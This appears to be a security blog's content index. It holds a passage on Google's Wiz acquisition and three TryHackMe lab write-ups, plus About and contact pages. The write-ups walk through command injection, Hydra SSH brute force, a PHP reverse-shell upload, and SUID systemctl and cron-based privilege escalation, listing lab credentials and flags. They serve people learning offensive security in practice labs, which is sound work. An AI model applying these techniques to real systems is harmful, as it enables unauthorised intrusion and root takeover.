If this lawsuit continues, it could potentially complicate the acquisition.\nConclusion: A New Chapter in Cloud Security\nGoogle’s $32 billion acquisition of Wiz marks a new era in cloud security, particularly in the realm of AI-driven solutions. As cloud adoption continues to grow, the demand for advanced security platforms like Wiz will only increase. By bringing Wiz into the fold, Google has strengthened its cloud offerings and positioned itself as a formidable player in the cybersecurity space.\nWith AI playing a crucial role in the future of cloud security, this acquisition could significantly shape the industry, offering businesses smarter, more efficient solutions to address growing cybersecurity risks.\nReferences\nGoogle Blog — Google Acquires Wiz\nThe Hacker News — Google Acquires Wiz for $32 Billion\nInvestor’s Business Daily — Google Stock and Cybersecurity\nSeeking Alpha — Google-Wiz Deal\nThe Verge — Google Acquires Wiz\nTimes of Israel — From Waze to Wiz: How Google Learned to Love Israeli Tech ","date":"24 March 2025","externalUrl":null,"permalink":"/articles/security-research-articles/how-google-s-32-billion-acquisition-of-wiz-is-set-to-transform-cloud-security-with-ai/","section":"Security Research \u0026 Articles","summary":"","title":"How Google’s $32 Billion Acquisition of Wiz is Set to Transform Cloud Security with AI","type":"articles"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “Jack-of-All-Trades”. The room is a simple boot-to-root machine… Jack-of-All-Trades — THM — WriteupHello everyone! This is an easy room from the TryHackMe platform called “Jack-of-All-Trades”. The room is a simple boot-to-root machine with the objective of finding the user flag and then the root flag.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. 
I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNo need to have that expression on your face, I know you’re just here for the sauce😹\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us:\nHowever, when encountering the “restricted” error, here’s a quick solution:\nOpen a new tab in your browser (in my case, Firefox).\nClick the three horizontal lines in the top-right corner to access the menu.\nSelect Settings from the menu.\nScroll all the way down to the Network Settings section.\nClick on the Settings button next to it.\nIn the settings window, choose the Manual proxy configuration option.\nEnter the desired IP address and set the port number to 22, as this port is used for HTTP connections on this box.\nThen, refresh the page, and you will be directed to the desired destination.\nImmediately run nmap on the tab and wait for the results, after which I use feroxbuster to scan with the following command:\nferoxbuster -u http://10.10.59.210:22/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 100\nI decided to open the /assets folder in a new tab. To my surprise, I found 4 files listed there.\nThen back on the web page, I start by looking through the page but don’t find anything that stands out. So, I decide to hit Inspect to dig into the page’s source code.\nWhile inspecting, I spot /recovery.php \u0026 notice some Base64 encoded text.\nI grab the Base64 string and decode it, revealing: \"Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! 
Also gotta remember your password: u?WtKSraq.\"\nI try out “Johnny Graves” and “Jack” as usernames with this password, but no luck.\nSo, I go back and inspect the login page once more, hoping to find a clue, and then I come across another encoded string which on inspection turns out to be Base32.\nIn a hurry, I attempt different decoding methods like ASCII and EBCDIC, but neither works.\nThen, taking a step back, I search online for Johnny Graves’ encoding method, and discover: “First, use ROT13, then Hex, then Base32.”\nWith this info, I drop the Base32 string into CyberChef and decode it in the correct order: Base32 → Hex → ROT13.\nThe decoded message gives me a hint:\n“Remember that the credentials to the recovery login are hidden on the homepage! Here’s a hint: bit.ly/2TvYQ2S”.\nI follow the hint and see Stegosauria pop up in the wiki. It also happens to be in the /assets folder as a file called steg with an image of a dinosaur.\nAt this point, I start thinking — could it be steganography? (because the word “stego” was there and my 1st task in my 1st ever CTF was steg 😂)\nI try decoding two images, and finally, header.jpg works and I discover the credentials:\nUsername: jackinthebox\nPassword: TplFxiSHjY\nUsing the credentials, I successfully log in to the system. I inspect the page’s source, but there’s nothing useful at first; then I notice “GET” in caps, leading me to think it’s a GET request.\nAnd, it clearly mentions cmd, which prompts me to toy with the cmd parameter.\nhttp://10.10.59.210/nnxhweOV/index.php?cmd=id\nhttp://10.10.59.210/nnxhweOV/index.php?cmd=ls+-la\nhttp://10.10.59.210/nnxhweOV/index.php?cmd=ls+-la+/home\nhttp://10.10.59.210/nnxhweOV/index.php?cmd=whoami\nThe ls command reveals a file named jacks_password_list.\nI use index.php?cmd=cat+/home/jacks_password_list to reveal a key hash.\nI copy the hash and save it into a text file using nano jak.txt. I then run Hydra to crack the SSH password:\nhydra -l jack -P jak.txt ssh://10.10.59.210:80\nThen, Hydra gives me the 
login credentials:\nUsername: jack\nPassword: ITMJpGGIqg1jn?>@\nI SSH into the machine using: ssh jack@10.10.59.210 -p 80 and then run:\nls -la to check out the files in the home directory.\nThe user.jpg catches my eye and I run a Python HTTP server:\npython -m SimpleHTTPServer 5000\nIn a new tab, I use wget to download the image:\nwget http://10.10.59.210:5000/user.jpg\nI open the downloaded image with eog:\neog user.jpg.1\nThe user flag is visible in the image. I then press Ctrl + C to stop the Python HTTP server in the first terminal.\nsecuri-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3}\nI search for setuid files using:\nfind / -perm -u=s -type f 2>/dev/null\nI find /usr/bin/strings in the output, so I then run strings on the root flag file:\nstrings /root/root.txt\nRoot flag:\nsecuri-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a}\nCONCLUSION:\nI hope this writeup walkthrough from my end was helpful to you guys.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well.\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/jack-of-all-trades-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Jack-of-All-Trades — THM — Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Vulnversity.” VULNVERSITY -THM -WRITEUPHello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “Vulnversity.”\nIt focuses on the fundamentals of using basic tools, along with an understanding of Nmap, Gobuster, reverse shells and privilege escalation.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy it! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nReconnaissance:\nWe start by enumerating open ports and services:\nnmap 10.10.204.172 --open {shows only the open ports}\nnmap 10.10.204.172 -sV {adds service and version detection for each open port}\nnmap 10.10.204.172 --open -O {adds operating system detection}\nLocating directories using Gobuster:\nAfter identifying a web server (port 3333), we brute-force directories using Gobuster:\ngobuster dir -u http://10.10.204.172:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\ngobuster dir → Runs a directory enumeration scan.\n-u → Specifies the URL to scan.\n-w → Uses a wordlist to find hidden directories.\nThe scan reveals the /internal/ directory, which leads to a file upload page.\nCompromise the Webserver:\nNow, with the task of compromising access, we utilise php-reverse-shell.\nFirst we go to the Pentest Monkey GitHub link provided and copy-paste it into a text file. Then we need to change the $IP to our system’s $IP. 
After this we name the file and save it.\nNext we set up a Netcat listener:\nnc -lvnp 1234\nnc → Runs Netcat, a network tool.\n-l → Listens for incoming connections.\n-v → Verbose mode (shows connection details).\n-n → No DNS resolution (faster).\n-p 1234 → Specifies the listening port.\nNext, we upload the php-reverse-shell.phtml file via the upload option.\nThen to trigger it, we visit:\nhttp://10.10.204.172:3333/internal/uploads/php-reverse-shell.phtml\nBy doing so, we get a reverse shell on the system as the web server user (www-data).\nNow that we are in, we first check the present working directory:\npwd\nsudo -l\nDoesn’t work (no sudo access).\nNext,\ncat /etc/passwd {checks system users \u0026 displays the user accounts}\nWe see Bill in our case, then we enter the same:\n$ cd home\n$ cd bill\n$ pwd\n/home/bill\n8bd7992fbe8a6ad22a63361004cfcedb\nThen we see user.txt, so we perform cat user.txt and get the user flag.\nPRIVILEGE ESCALATION:\nThen, we perform this command:\nfind / -user root -perm -4000 -exec ls -ldb {} \\; 2>/dev/null\nThis searches for SUID binaries (executed with root privileges); finding SUID binaries is a core privilege escalation technique.\n/bin/systemctl has SUID set, which is unusual, and that answers the first question.\nSystemctl is a command-line tool that allows for the management and monitoring of the systemd system and service manager.\nNext,\nI utilized GTFOBins to search for “systemctl,” which directed me to a small script. After making a few adjustments we can run it line by line.\n(I found John Hammond’s video on this specific topic incredibly helpful. 
I highly recommend following him and exploring his content, as I found it very informative)\nTF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nCreates a temporary systemd service that runs a command as root.\n./systemctl link $TF\n./systemctl enable --now $TF\nLinking the unit and enabling it with --now starts it immediately; because systemctl is SUID root, the unit runs as root and the id output lands in /tmp/output.\nThen,\n$ cd /tmp/\n$ ls\nWhich then shows the output file present.\n$ cat output\na58ff8579f0a9270368d33a9966c7fd5\nI hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on the fundamentals.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"16 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/vulnversity-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"VULNVERSITY -THM -WRITEUP","type":"writeups"},{"content":"EASY PEASY — THM CTF — WRITEUP\nHello everyone! This is an easy room from the TryHackMe platform called “Easy Peasy”. The room covers basic tool usage such as nmap, feroxbuster, and gobuster.\nWhile the room is marked as “easy,” there are a few twists in the process that might make some steps challenging. But that’s where this write-up comes in to guide you through!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. 
I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNo need to have that expression on your face, I know you’re just here for the sauce😹\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us:\nI know there’s nothing here for now, so the next step is to find the open ports. Let’s use nmap to uncover them.\nFirst, I run the following command to scan all ports on the target machine:\nnmap -sV -p- 10.10.14.65 --open\n-sV: Enables version detection to identify the versions of services running on open ports.\n-p-: Scans all 65535 ports on the target machine.\n10.10.14.65: The target IP address you are scanning.\n--open: Displays only the open ports, filtering out closed ones from the results.\nWhile this command runs and gives us the output, I’m also running the following command to see if I can find anything else or uncover more details:\nnmap -sCV -p90,6498,65524 10.10.14.65\n-sCV: Runs the default NSE scripts (-sC) and performs service and version detection (-sV).\n-p90,6498,65524: This specifies the ports we want to scan (90, 6498, and 65524).\n10.10.14.65: The target IP address.\nWhile copying and pasting this command, make sure to change the IP to your target’s IP — unless you want a bizarre response in the terminal.\nBy running this command, we immediately spot the answers to the three questions:\n3 open ports\nnginx 1.16.1\nApache\nTASK 2:\nNext, in our terminal, we’ll use feroxbuster (you could use gobuster if you’d like, but I’m more used to running feroxbuster).\nRun the following command:\nferoxbuster -u http://10.10.14.65/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\nOnce it’s done, we get the following results, which prompt me to open them. 
I then copy and paste the results into two different tabs for further exploration.\nUpon initially seeing it, I thought it might be steganography. I tried downloading the images and running them through a tool, but there were no results. Then, I decided to inspect the page.\nIn hindsight, starting by inspecting the page would have been a better approach.\nHere, we don’t find anything, so we move on to inspect the next page.\nThen, we come across this, and from prior experience and by looking at it closely, I can tell it’s likely encoded in Base64.\nSo, I copy it and head over to https://www.base64decode.org/ to decode it. This leads me to the first flag.\nflag{f1rs7_fl4g}\nNow, to figure out the other flags, I refer to the three port numbers mentioned in the Nmap scan and navigate to port 65524, which is open with HTTP. This leads me to the Apache page.\nSitting on the Apache page, my first instinct is to check the robots.txt file for any entries aimed at web crawlers. And sure enough, it leads me to this:\nUser-Agent:a18672860d0510e5ab6699730763b250\nI notice this is an MD5 hash, so I look it up on https://md5hashing.net/ and uncover the second flag.\nflag{1m_s3c0nd_fl4g}\nWhile inspecting the Apache page, I noticed something hidden in plain sight. In the page’s HTML source code, I found the third flag:\nFl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}\nSummary of the 3 flags\nNow, this is where things get a bit twisted. After looking around for a bit, I finally realized something when I saw this while inspecting the same page, just above the third flag, next to the word ‘hidden’:\nObsJmP173N2X6dOrAgEAL0Vu\nNow, with this clue, we need to figure out what to do next. 
I use https://www.dcode.fr/cipher-identifier and identify that it’s encoded in Base62.\nAfter decoding the string ObsJmP173N2X6dOrAgEAL0Vu, I get /n0th1ng3ls3m4tt3r, which looks like a directory path.\nI then use the decoded directory path, which leads me to this page with an image.\nSo, I proceed to download both the image (bbi.jpg) and the wordlist (easype.txt). Then, in the terminal, I start the steganography cracking process by running the following command first:\n-> stegcracker bbi.jpg easype.txt\nThis brute-forces the steghide passphrase of the image with the wordlist, which leads me to:\npassword: mypasswordforthatjob\nI perform the following command to extract the hidden content:\n-> steghide --extract -sf bbi.jpg\n--extract: This flag tells steghide to extract hidden data from the image.\n-sf bbi.jpg: The -sf flag specifies the input (stego) file, in this case, bbi.jpg.\nUpon discovering the username boring, it prompts the thought of SSH/FTP to me. Since we know the data is in binary, we decode it online using this site.\nPassword: iconvertedmypasswordtobinary\nAfter decoding, we get the password: iconvertedmypasswordtobinary.\nWith this, I head to the terminal and attempt to access the SSH service using the following command: ssh boring@10.10.14.65 -p 6498\n(port 6498, since the nmap scan showed SSH on that port).\nI enter the password and gain access to the system. Wasting no time, I immediately use the ls command to list the files present. Among the files, I find user.txt. I then use the cat command to open it and retrieve the contents, which reveals this:\nThis immediately shows that ROT decoding is needed. I head over to dCode ROT and enter the ROT-encoded flag string.\nVoila! I decode it and get the flag for user.txt:\nflag{n0wits33msn0rm4l}\nNow that I have the user.txt flag, I turn my attention to gaining access to root.txt. 
To do that, I start by checking for any potential ways to elevate my privileges.\nFirst, I run sudo -l, but it doesn’t yield any helpful results. So, I move on to check the system crontab for any interesting entries: cat /etc/crontab\nHere is the peculiar entry:\n* * * * * root cd /var/www/ \u0026\u0026 sudo bash .mysecretcronjob.sh\nThis line indicates that there is a cron job running every minute as the root user that executes the script .mysecretcronjob.sh inside /var/www/.\nThe job runs the script as root, so if our user can write to that script, whatever we put in it is executed as root within a minute, which gives us an opportunity for privilege escalation.\nI refer to the Pentest Monkey Cheat Sheet for a reverse shell payload. I then place the payload in the bash file, and simultaneously, I open a new terminal tab to start the listener: {nc -lvnp 4444}\nWhen the cron job runs the reverse shell payload, I gain a root shell on the system. I then proceed with the following 4 commands:\nls — To list the contents.\ncd ~ — To navigate to the home directory.\nls -la — To list all files, including hidden ones.\ncat .root.txt — To read the root flag and complete the objective.\nThis leads us to the root flag: flag{63a9f0ea7bb98050796b649e85481845}, and with that, we have successfully completed the room!\nCONCLUSION:\nI hope this writeup walkthrough from my end was helpful to you guys. I thought it would be a quick room, but it challenged me, and in the end, it was fun to complete.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/easy-peasy-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"EASY PEASY — THM CTF — WRITEUP","type":"writeups"},{"content":"Hi, I’m 5kullk3r — a tech professional building a specialized foundation in security and digital risk. I combine technical curiosity with business acumen, aiming to operate at the sharp end of crisis management — stepping into major breaches or system conflicts to mitigate risk and guide an infrastructure back to operational stability.\n01 · The Journey \u0026 Philosophy #\nThe Backstory: I started as a complete newbie. I didn’t know what a basic Linux command like ls did, let alone how to run a proper network scan with nmap.\nThe Philosophy: Be the guide I wish I had when I first started. Most writeups copy-paste final flags without explaining the why.\nThe Method: When breaking down challenges on TryHackMe, OverTheWire, and HackTheBox, I document the complete thought process — including the mistakes and the structural rabbit holes. Showing the long route is how real learning happens.\n02 · Birth of the Page #\nThe Forced Pivot: This platform exists because of a forced move into digital sovereignty.\nThe Trigger: I originally hosted my technical analyses on Medium, but the platform abruptly suspended my account, demanding the removal of my writeups.\nThe Result: Rather than letting a third-party gatekeeper dictate how I share knowledge, I built my own infrastructure. This self-hosted blog belongs entirely to the community.\n03 · My Rig \u0026 Environment #\nThe Daily Driver: Apple Silicon MacBook running an optimized macOS environment — efficient, stable, and built on a solid Unix foundation.\n
The Lab: A dedicated target environment running a highly customized Kali Linux instance, tailored to my specific testing workflows.\nThe Hardware Failure: My previous Windows 10 machine literally blew up mid-operation under the weight of a heavy Hashcat password-cracking session and video games 😮‍💨.\nOff the Clock: I clear mental fatigue by staying active in high-intensity physical sports and tuning into a solid rap playlist.\n","externalUrl":null,"permalink":"/about/","section":"Home","summary":"","title":"About Me","type":"page"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":" If you need to transmit sensitive findings, vulnerability data, or professional inquiries securely, use Setup B: The Cryptographic Drop Box.\nHow to send an encrypted payload: #\n1. Copy the metadata-free public PGP key block below.\n2. Encrypt your message text locally on your own machine with that key.\n3. Paste the resulting encrypted (ASCII-armored) text output directly into the Secure Message Portal below and hit submit.\nYour message will route safely to the destination backend without exposing email identifiers, IP routes, or cleartext metadata to public gateway monitors.\n1. 
Public Drop Box Key # -----BEGIN PGP PUBLIC KEY BLOCK----- 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 FfK1zI4TWw== =x50B -----END PGP PUBLIC KEY BLOCK----- **Key Fingerprint:** `7716 7EBC 70F9 165C 1BBD D2DF BD63 
7107 A527 4772`\n\n### 2. Secure Message Portal\nSender Alias (Optional)\nEncrypted PGP Payload\nTransmit Payload\n","externalUrl":null,"permalink":"/contact/","section":"Home","summary":"","title":"Secure Communications","type":"page"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"}]